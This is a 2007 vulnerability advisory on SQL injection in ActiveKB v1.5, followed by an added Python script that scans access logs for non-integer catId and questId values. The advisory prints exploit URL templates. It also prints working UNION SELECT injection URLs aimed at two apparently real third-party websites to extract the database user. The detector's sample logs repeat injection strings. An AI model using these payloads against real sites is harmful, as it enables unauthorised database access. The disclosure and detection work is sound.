SQL injection in ActiveKB v1.5

2007-08-28T00:00:00
ID SECURITYVULNS:DOC:17901
Type securityvulns
Reporter Securityvulns
Modified 2007-08-28T00:00:00

Description

Hello, 3APA3A.

Software: ActiveKB v1.5
Vendor: www.interspire.com
Vulnerability: multiple SQL injections
Risk: medium
Date: 27.08.2007
discovered by durito [damagelab] -durito[at]mail[dot]ru-
HTTP: durito.narod.ru

+~~~:| Details |:

SQL injections

+~~~:| Exploit |:

http://www.target.com/activekb/index.php?ToDo=browse&catId=[SQL]
http://www.target.com/activekb/admin/index.php?ToDo=hideQuestion&questId=[SQL]

+~~~:| Example |:

http://www.accessecu.com/kb/index.php?ToDo=browse&catId=5+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(user(),0x73),0x73),4,5,6,7/
http://summitsupport.net/index.php?ToDo=browse&catId=5+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(user(),0x73),0x73),4,5,6,7/

--
Regards, durito [NGH Group]
mailto:durito@mail.ru
http://durito.narod.ru
http://ngh.void.ru
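
A log check for the two parameters named in this advisory, as an added example that is not part of the original advisory or of ActiveKB's code: it flags requests where `catId` (with `ToDo=browse`) or `questId` (with `ToDo=hideQuestion`) is not a plain integer. It assumes both parameters are meant to carry integer IDs and that requests are logged in the common access-log format; the function names and the sample log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# ToDo action -> ID parameter, as listed in the advisory.
# Assumption: both parameters should only ever hold an integer ID.
WATCHED = {"browse": "catId", "hideQuestion": "questId"}
INT_RE = re.compile(r"[0-9]{1,10}")
# Request line inside a common/combined-format access log entry.
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_param(url):
    """Return (param, decoded_value) if a watched ID is not a plain integer, else None."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for action in params.get("ToDo", []):
        param = WATCHED.get(action)
        if param is None:
            continue
        for value in params.get(param, []):
            # parse_qs has already decoded %XX escapes and '+' (space)
            if not INT_RE.fullmatch(value):
                return (param, value)
    return None

def scan(lines):
    """Return [(line_number, param, value)] for every flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQ_RE.search(line)
        if match:
            hit = suspicious_param(match.group(1))
            if hit:
                hits.append((number, *hit))
    return hits

# Constructed sample log lines (documentation IP range, hypothetical install path).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Aug/2007:10:00:01 +0000] "GET /activekb/index.php?ToDo=browse&catId=5 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [28/Aug/2007:10:00:07 +0000] "GET /activekb/index.php?ToDo=browse&catId=5+union+select+1,2,3 HTTP/1.1" 200 4803',
    '192.0.2.44 - - [28/Aug/2007:10:00:09 +0000] "GET /activekb/admin/index.php?ToDo=hideQuestion&questId=7%27 HTTP/1.1" 200 310',
    '192.0.2.10 - - [28/Aug/2007:10:00:12 +0000] "GET /activekb/index.php?ToDo=search&q=union+select HTTP/1.1" 200 2200',
]

if __name__ == "__main__":
    for number, param, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-integer {param}={value!r}")
```

The check only sees values in the query string; the same parameters sent in a POST body do not appear in a standard access log and would need to be inspected at the application or WAF layer.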